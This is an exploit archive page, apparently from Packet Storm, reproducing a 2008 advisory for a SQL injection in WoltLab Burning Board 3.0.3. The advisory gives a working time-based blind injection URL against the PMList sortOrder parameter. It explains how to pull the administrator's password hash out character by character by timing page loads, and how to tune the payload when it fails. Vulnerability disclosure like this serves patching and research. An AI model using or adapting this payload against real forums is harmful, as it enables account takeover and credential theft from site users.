exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

woltlab303-sql.txt

woltlab303-sql.txt
Posted Feb 20, 2008
Authored by NBBN

Woltlab Burning Board version 3.0.3 PL1 suffers from a SQL injection vulnerability.

tags | exploit, sql injection
SHA-256 | b224983ea5e1209466473051b4e6e49d7d81d3ac59f525c15e928018d4918598

woltlab303-sql.txt

Change Mirror Download
##############################################################################################
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN
Vendor: http://woltlab.de
##############################################################################################


::Proof of Concept
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,
(SELECT password FROM wcf1_user WHERE userID=1 AND
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

An attacker should have to register at the board to use this.

You can ask TRUE/FALSE questions to the database. Modify 3000000 if the stuff
doesn't work. On some MySQL Versions you need to edit this query



::Explain:

...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

1,1 is the position in the crypted password. 55 is the char in the
ascii-table.

In this example we ask for number 7 in the hash, position 1. If the page load
fast, you find a true char. If not, ask other chars ;-).If you enter a char
that is higher then the true's, the page load fast to, so start from 48 first
and go higher.



::Vulnerabiltiy
As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so
I don't test it, because there is no reason and I am not a cracker ;-)

WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX
WoltLab Burning Board 3.0.1 PLX
WoltLab Burning Board 3.0.0 PLX
Possible WoltLab Burning Board 3.0.4 (not tested)...



Please don't use this to crack forums. All what you do with this is at your
own risk.






Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close